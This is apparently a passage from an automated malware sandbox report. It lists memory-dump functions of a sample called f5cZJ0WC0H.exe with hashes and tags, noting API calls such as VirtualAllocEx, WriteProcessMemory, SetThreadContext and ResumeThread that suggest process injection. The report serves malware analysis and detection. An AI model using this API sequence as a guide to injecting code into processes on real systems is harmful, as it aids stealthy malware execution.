                                                      • Instruction Fuzzy Hash: 5FA15774A002189FCB05DFA4C581ADDBBF2BF49304F1984A8E805AF395CB75DD86CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05335FCD, Relevance: .1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4db3b22b834142ba01183479bb888f816c217d4dfdeddf7eb16926ed0fda9b0a
                                                      • Instruction ID: 0c93b947c443c32c0a847c82c2aaa2470bc9ef61ff2a554ae74aa8d80a5a79e9
                                                      • Opcode Fuzzy Hash: 4db3b22b834142ba01183479bb888f816c217d4dfdeddf7eb16926ed0fda9b0a
                                                      • Instruction Fuzzy Hash: C1510371D04368DFDB60CF55C881BDEBBB6BB48304F14819AE509B7250DB716A84CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05335FD8, Relevance: .1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eaa83b55ba4d9bceb7c2d9bd58b56ff1d959e5b5b5830648c60c536263779f28
                                                      • Instruction ID: 6108095409a0217e2b52691ecfeaacf26934bfb198d01bd32ef93cd368c4fddc
                                                      • Opcode Fuzzy Hash: eaa83b55ba4d9bceb7c2d9bd58b56ff1d959e5b5b5830648c60c536263779f28
                                                      • Instruction Fuzzy Hash: 9841E071D04368DFDB60CF55C981BDEBBB6BB48304F15819AE909A7250CB716A88CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0533FD80, Relevance: .1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13807de663df6816921fead0ea8b063ca5fa14144b89d77aadff5dd1c2d2d594
                                                      • Instruction ID: 46749e1f87179ea320f561e5a3d322eaf8477f46f83cce9c2e8eb728cb91ac6c
                                                      • Opcode Fuzzy Hash: 13807de663df6816921fead0ea8b063ca5fa14144b89d77aadff5dd1c2d2d594
                                                      • Instruction Fuzzy Hash: 43316F3AB00219CFCB00DFA5D854AAEBBB6EFC4321F10C02AE9159B351CB35D956CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0533FC08, Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d3c465d34adb42338a0c57f0aeab8ec5b5d5a286f16619e5228de5920044b97
                                                      • Instruction ID: 499ee107f82aa6556f1cee1f0ad2691e136ed9bfed98d8da13c639d8b7db771f
                                                      • Opcode Fuzzy Hash: 5d3c465d34adb42338a0c57f0aeab8ec5b5d5a286f16619e5228de5920044b97
                                                      • Instruction Fuzzy Hash: 9A215A752043049BD754DF19E480B8AB7E2FB84258F20CA3DE559CF751DB72EA4A8B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0533FBF8, Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f74c27b6fbdabeb4fc6e7134ce8c7ad128fad02c827270dfefdac93f61bb290c
                                                      • Instruction ID: 98931e0dc4ab0788ecfaf3f68a9447742c086755b3f022771e6786a1fe613c8a
                                                      • Opcode Fuzzy Hash: f74c27b6fbdabeb4fc6e7134ce8c7ad128fad02c827270dfefdac93f61bb290c
                                                      • Instruction Fuzzy Hash: 75219DB52043049FD708DF1AE48078ABBE2BF85254B24CA6ED499CF341C772E9078B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0365D005, Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.337685614.000000000365D000.00000040.00000001.sdmp, Offset: 0365D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02b95cd4f90367532c83b3b403de561488dfdd2eecbf6c5399382ee70510185a
                                                      • Instruction ID: c03de87f5b586b7c159ea4c25b27fb1e2ffab8432d0adffebbd745f9c9e17766
                                                      • Opcode Fuzzy Hash: 02b95cd4f90367532c83b3b403de561488dfdd2eecbf6c5399382ee70510185a
                                                      • Instruction Fuzzy Hash: F701296240D3C4AFE7128B258D94652BFA8EF43624F0980DBE9848F2D7D2695C49C772
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0365D01D, Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.337685614.000000000365D000.00000040.00000001.sdmp, Offset: 0365D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 75d64036466de3cd437648c1edc1ac25400c0e3ce73f7a26fbdc65bfeb411cdc
                                                      • Instruction ID: a98e7b36757b2ab500742e82b255478a5f743a736381614b667577bc071c3e1f
                                                      • Opcode Fuzzy Hash: 75d64036466de3cd437648c1edc1ac25400c0e3ce73f7a26fbdc65bfeb411cdc
                                                      • Instruction Fuzzy Hash: 3601F772408380AAE7108E15CD84B66FB98EF41668F088569FD455B3C6C3799946C6B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05337341, Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7db52283c4c2a60a11976c9a6c439a7443674303c0f0a66019f1e78de537b43d
                                                      • Instruction ID: 761cadd74bbdb0167bc982aa0c0b0a46ace39a7c9582f8c27be63d44003b66fd
                                                      • Opcode Fuzzy Hash: 7db52283c4c2a60a11976c9a6c439a7443674303c0f0a66019f1e78de537b43d
                                                      • Instruction Fuzzy Hash: FAF024A62083917BC311415A5801BB7BFBDEBC2161B08406BF844C3682C41AC80083F0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: f5cZJ0WC0H.exe PID: 1268 Parent PID: 5972 f5cZJ0WC0H.exeCOMMON

                                                      Executed Functions

                                                      Function 04C438E3, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 04C43975
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID:
                                                      • API String ID: 1778838933-0
                                                      • Opcode ID: c308d90f0ab8a5f9a6917cf4bd1649c283ac4ae779eb34c4d306633cda982182
                                                      • Instruction ID: 3d2b60f655db5efdd2fbcf4a73d4bcfb7fd807d990d8ac4999ced999ea840421
                                                      • Opcode Fuzzy Hash: c308d90f0ab8a5f9a6917cf4bd1649c283ac4ae779eb34c4d306633cda982182
                                                      • Instruction Fuzzy Hash: F521E3B5900258DFCB10CF99D984BDEBBF5FB88314F14852AE958A7750C374A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C438E8, Relevance: 1.6, APIs: 1, Instructions: 61nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 04C43975
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID:
                                                      • API String ID: 1778838933-0
                                                      • Opcode ID: 71bbe0f86883718860f14160eddaa6a497104ddabf1835cdf975709e4bb2162f
                                                      • Instruction ID: e765724209e3008460174051c88bea037e85a67e85309e86950feeb1a2eb161a
                                                      • Opcode Fuzzy Hash: 71bbe0f86883718860f14160eddaa6a497104ddabf1835cdf975709e4bb2162f
                                                      • Instruction Fuzzy Hash: 2E21E2B1900288DFCB10CF9AD984BDEBBF4FB88314F10852AE918A7750D374A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4AA25, Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C4AC66
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 89db29dafb1454db80915660ce4c88c62920b1ff95727b19255f1eaa5d48279f
                                                      • Instruction ID: 361200a366428e3250c81e2872435b1cf73e76530068122db6bc2d8f9bdf1496
                                                      • Opcode Fuzzy Hash: 89db29dafb1454db80915660ce4c88c62920b1ff95727b19255f1eaa5d48279f
                                                      • Instruction Fuzzy Hash: 4DA15E71D00219DFDF20CF68C9817DEBBB2BF88314F158569E809A7290DB759A85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4AA30, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C4AC66
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: ecc0616c76ed7a660ad0cd32d3f026b741ef5b599c852369e230b88919cc5ac8
                                                      • Instruction ID: ccf3f2767b91411c6c467ef55f6b4d0b10174f5c2515a229fcd997e064318383
                                                      • Opcode Fuzzy Hash: ecc0616c76ed7a660ad0cd32d3f026b741ef5b599c852369e230b88919cc5ac8
                                                      • Instruction Fuzzy Hash: 4F915D71D40219DFDF10CF68C941BDEBBB2BF88314F158569E809A7280DB75AA85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4E9D8, Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 04C4EC2E
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: e35af64cc818770caf62fb08c033613e9ad7cf729d258bf55d8e98106938b88e
                                                      • Instruction ID: d10a74ae58b4c7f0e13d12e1b768eee9ff26cc4b1c2997e6e5503b7e6e430037
                                                      • Opcode Fuzzy Hash: e35af64cc818770caf62fb08c033613e9ad7cf729d258bf55d8e98106938b88e
                                                      • Instruction Fuzzy Hash: 3A812270A00B058FDB24DF69D14469ABBF2BF88304F058A2ED48AD7A50D735F949CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 008C38A8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 008C5421
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.363642041.00000000008C0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 6b476b403cfb0fd6cadb680aaa7180bd5cb63ea39d84c38650ceb30029cb6e7b
                                                      • Instruction ID: 1a0300f9125d32658ab240d28daba3d2be48c89c6d0359af9ef6b21486d2d99b
                                                      • Opcode Fuzzy Hash: 6b476b403cfb0fd6cadb680aaa7180bd5cb63ea39d84c38650ceb30029cb6e7b
                                                      • Instruction Fuzzy Hash: DE41E0B0C04618CBDF24CFA9C884B8EBBB5FF49308F258059D409AB251DBB56989CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4BB98, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C4BC30
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 62c68fb774623dae139331ee470207213ca638f100a87a96e01e0921c0c13f52
                                                      • Instruction ID: c5dcdaf0aefb43ad448882acef736dc87e9c5c3ebacde9aaff2bb059cd70499a
                                                      • Opcode Fuzzy Hash: 62c68fb774623dae139331ee470207213ca638f100a87a96e01e0921c0c13f52
                                                      • Instruction Fuzzy Hash: 792137B1D003599FCB10CFA9C9847EEBBB1FF88314F148429E958A7240D778A955CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4BBA0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C4BC30
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 012c19106de178415a0505550b7e7acdfafb60c2a77c2fcff100218c9e202351
                                                      • Instruction ID: f43e5994ec97f4d8d934e90565d4af24e3bc7c90f2e8502987ab9a6bc3a2c179
                                                      • Opcode Fuzzy Hash: 012c19106de178415a0505550b7e7acdfafb60c2a77c2fcff100218c9e202351
                                                      • Instruction Fuzzy Hash: 452115B19003599FCB10CFA9C984BEEBBF5FF48314F10842AE918A7240D778A954CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4B4D1, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 04C4B556
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 0902081c6c15578a8778d0a8025fae539553102714cf1adddc31ad7c11dff694
                                                      • Instruction ID: 406204109e787ab32f96eb595514198812de38264dde8565f6949cc57d35c789
                                                      • Opcode Fuzzy Hash: 0902081c6c15578a8778d0a8025fae539553102714cf1adddc31ad7c11dff694
                                                      • Instruction Fuzzy Hash: 7D215771D042498FCB10CFAAC5847EEBBF1AF88314F15842ED419A7350DB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4B4D8, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 04C4B556
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: ceeca62e6499344b4cf027a67f9731725aed4d72ea8eaf4dcec43a56a9f44577
                                                      • Instruction ID: bed8fe68afa5273e7d316a4704fa2a1b63cebc5faac298c1ddedbfed5062c50d
                                                      • Opcode Fuzzy Hash: ceeca62e6499344b4cf027a67f9731725aed4d72ea8eaf4dcec43a56a9f44577
                                                      • Instruction Fuzzy Hash: 86213871D042498FCB10CFAAC5847EEBBF5EF88324F54842AD519A7340DB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4BA88, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04C4BB01
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 96866eb20c2000b85b7671dbc9c4e65dd1f83acb75383f062c12e0f9b5d43b43
                                                      • Instruction ID: 1f1417c64163011a6851c9831cb3384259d7ddc121a13dd3b84afa19457085df
                                                      • Opcode Fuzzy Hash: 96866eb20c2000b85b7671dbc9c4e65dd1f83acb75383f062c12e0f9b5d43b43
                                                      • Instruction Fuzzy Hash: 4221E2B5C002599FDB10CF99D984BDEBBB4FB48320F14842AE958A7200D379AA45CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4BC89, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C4BCFE
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 369348034435f0852a3f4c4663a4b665867ae28276aeefae668da208f3b8fe7c
                                                      • Instruction ID: fd70519e06d94a69c67e3a0e3745689ea9f5820edc44bd47893d6b456217423f
                                                      • Opcode Fuzzy Hash: 369348034435f0852a3f4c4663a4b665867ae28276aeefae668da208f3b8fe7c
                                                      • Instruction Fuzzy Hash: 1C1197728042489FCB10CFA9D884BDFBBF5EF88324F148819E529A7210C775A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C42843, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04C428BB
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 59b1b13ec3a30e27237eed5abc18d4b7ab61daa044ffc0efe5644aa29d82f1f7
                                                      • Instruction ID: 6f5eed6811b85a8f446e8f921a6adcf6cce38907677ad067c7dd2ac7c8b92743
                                                      • Opcode Fuzzy Hash: 59b1b13ec3a30e27237eed5abc18d4b7ab61daa044ffc0efe5644aa29d82f1f7
                                                      • Instruction Fuzzy Hash: 6D2106B1D042499FDB10CF9AD584BDEBBF4FB48320F14842AE858A7350C374A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4DDA0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C4ECA9,00000800,00000000,00000000), ref: 04C4EE9A
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 3370f701de70ee297d220c339dd9239f7ef935de1d6afb9fdc19a308483379e7
                                                      • Instruction ID: c7543831fd9f7a2b06c98216aa054e3c5d74cc47a6f4fbda8099c73957984d40
                                                      • Opcode Fuzzy Hash: 3370f701de70ee297d220c339dd9239f7ef935de1d6afb9fdc19a308483379e7
                                                      • Instruction Fuzzy Hash: 9C1103B2D042088FDB10CF9AD544ADEBBF5FB88320F15842AE915A7200C375AA45CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C42848, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04C428BB
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 94d1f066cb71f7b4e51f92e373e8f830a8e3156742cb20f5e198910878c1fccd
                                                      • Instruction ID: 5a7239df77e1e0e87451e172d789ce82e73e4e79b61fb4c9b1336c1595a515d9
                                                      • Opcode Fuzzy Hash: 94d1f066cb71f7b4e51f92e373e8f830a8e3156742cb20f5e198910878c1fccd
                                                      • Instruction Fuzzy Hash: FF21D3B1D002499FDB10CF9AD584BDEBBF4FB48320F14842AE958A7250D378A685CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4BA90, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04C4BB01
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 156bd82064c201ee2e51730a67024dd36ec0c77375f997dba28fc58b14a74b22
                                                      • Instruction ID: 2a7e56b914133ea9e2c3af61f83e48371d86d4e5c17674e015d91075ec6a5cb8
                                                      • Opcode Fuzzy Hash: 156bd82064c201ee2e51730a67024dd36ec0c77375f997dba28fc58b14a74b22
                                                      • Instruction Fuzzy Hash: B221C5B5D002599FDB10CF99D984BDEBBF8FB48310F10841AE958A3200D374A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4BC90, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C4BCFE
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 2c213ca42cbcb264cc4bb25e95d50b9140a0c41644825bb8949c7f3d8600482f
                                                      • Instruction ID: b9ca49cde3fb00a823e00d957b44dbff4b6df1770def3b7e621de799a38e3fba
                                                      • Opcode Fuzzy Hash: 2c213ca42cbcb264cc4bb25e95d50b9140a0c41644825bb8949c7f3d8600482f
                                                      • Instruction Fuzzy Hash: 6F1176718042489FCF10CFAAC944BEFBBF5EF88324F14881AE519A7250C775A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4EE29, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C4ECA9,00000800,00000000,00000000), ref: 04C4EE9A
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: a272cd4bf17c7e72617e57e4c562ea5503982bc29cc5cd0c75681e5b4806d8e4
                                                      • Instruction ID: d17b3257344fa973a2e7e4e4b6380a233bf0c3bfb898b9587f56acd92d71f082
                                                      • Opcode Fuzzy Hash: a272cd4bf17c7e72617e57e4c562ea5503982bc29cc5cd0c75681e5b4806d8e4
                                                      • Instruction Fuzzy Hash: 8F1144B6D002088FCB00CF99D5446DEBBF5FB88320F11842ED919A7200C378A645CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4BF40, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 03656db63d8fbdebed2dcc61d4c5f7f3b22503b9ca664c9268088614cdcad6a4
                                                      • Instruction ID: d8cc33e6761eeaed7592535e888218798d1b304a1cb1b02f525f04fc0e9b7fdc
                                                      • Opcode Fuzzy Hash: 03656db63d8fbdebed2dcc61d4c5f7f3b22503b9ca664c9268088614cdcad6a4
                                                      • Instruction Fuzzy Hash: 081155B1D042498FDB10DFAAC9447EEBBF5AF88324F24842AD519B7240D778A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4BF48, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: de519e6e7b2afcc05b46510055aed8c70105956880b94981012780a113014257
                                                      • Instruction ID: bf14582b88291d3d8c26d98a9ac7becbb18d7e1dec96285bd2aeb8ea04e5438a
                                                      • Opcode Fuzzy Hash: de519e6e7b2afcc05b46510055aed8c70105956880b94981012780a113014257
                                                      • Instruction Fuzzy Hash: AF1155B1D042488BDB10CFAAC9447EEBBF5AF88224F14841AD519A7240D774A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C4EBC8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 04C4EC2E
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: c2ead2e0d4702c6c625275062a2224c5bf86657da1a62dda778a5197a07fb66d
                                                      • Instruction ID: 9564447ed3503614ca3042f43179a0bab90100e8e9776f81504d1139aa5d5b70
                                                      • Opcode Fuzzy Hash: c2ead2e0d4702c6c625275062a2224c5bf86657da1a62dda778a5197a07fb66d
                                                      • Instruction Fuzzy Hash: 1D11DFB6C006498FDB10CF9AD544ADEFBF5BB88324F15841AD859A7600C375A545CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C51060, Relevance: .3, Instructions: 331COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d999e4a8dcf1119583b1d149cd2ec54f7d7d155f8b480c06889b5a6ca78db6dd
                                                      • Instruction ID: 9445bc6c4086bbb5fac32700655fb9345bd42a22795a238d87c676d2352c9856
                                                      • Opcode Fuzzy Hash: d999e4a8dcf1119583b1d149cd2ec54f7d7d155f8b480c06889b5a6ca78db6dd
                                                      • Instruction Fuzzy Hash: 24D18B35D00209DFCB05EF94C884C9DBBBAFF4A304B1580A6E915AB261DB31FD56DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C50AE0, Relevance: .3, Instructions: 289COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 395c1c7028ca9e2a5ffb8abf1a160d649da792b66c0b339eb383417792ffa375
                                                      • Instruction ID: f9fa829ab67e9bc9ce6b8f9041a6f07bba29a47a32557bf2f1546d59ea957a3c
                                                      • Opcode Fuzzy Hash: 395c1c7028ca9e2a5ffb8abf1a160d649da792b66c0b339eb383417792ffa375
